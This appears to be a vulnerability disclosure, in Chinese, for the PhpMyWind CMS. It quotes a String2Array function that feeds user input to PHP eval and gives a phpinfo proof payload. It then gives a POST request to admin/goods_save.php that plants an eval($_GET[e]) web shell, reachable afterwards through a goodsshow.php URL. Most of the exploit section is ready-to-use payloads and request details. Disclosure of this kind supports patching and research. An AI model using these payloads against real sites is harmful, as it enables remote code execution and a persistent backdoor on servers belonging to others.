<ul><li>/include/common.func.php</li></ul><pre class="">/*字符串转数组*/
if(!function_exists('String2Array'))
{
function String2Array($data)
{
if($data == '') return array();
@eval("\$array = $data;");
return $array;
}
}
<br></pre><p>$data变量进入eval执行,当传入$data为:<br></p><pre class="">111|222{${phpinfo()}}</pre><p>执行的PHP语句为:</p><pre class="">@eval("$array = array("1"=>"111|222{${phpinfo()}}","2"=>"");;")</pre><p>页面返回: </p><p><img alt="3E345D6A-1A9E-4B51-9770-ADEEFB04CFC9.png" src="https://images.seebug.org/@/uploads/1434594139629-3E345D6A-1A9E-4B51-9770-ADEEFB04CFC9.png" data-image-size="628,390"><br></p><p>证明漏洞存在。</p><p>以可以发表文章的帐号登陆;</p><p>POST数据:</p><pre class="">classid=12&typeid=10&attrvalue[]=111|222{${eval($_GET[e])}}&attrid[]=1&attrid[]=2&checkinfo=true&action=add</pre><p>到地址:</p><pre class="">http://10.211.55.3/phpmywind/admin/goods_save.php</pre><p>得到id为38; </p><p><img alt="8DD7EF21-8F04-46EC-A1B5-1C9DFEFA8CD7.png" src="https://images.seebug.org/@/uploads/1434594188966-8DD7EF21-8F04-46EC-A1B5-1C9DFEFA8CD7.png" data-image-size="811,171"><br></p><p>得到Shell地址:</p><pre class="">http://10.211.55.3/phpmywind/goodsshow.php?cid=12&tid=10&id=38&e=phpinfo();</pre><p><img alt="824AC4F3-7298-488A-A66E-A7813F47071D.png" src="https://images.seebug.org/@/uploads/1434594195950-824AC4F3-7298-488A-A66E-A7813F47071D.png" data-image-size="766,469"><br></p>
京公网安备 11010502034610号
暂无评论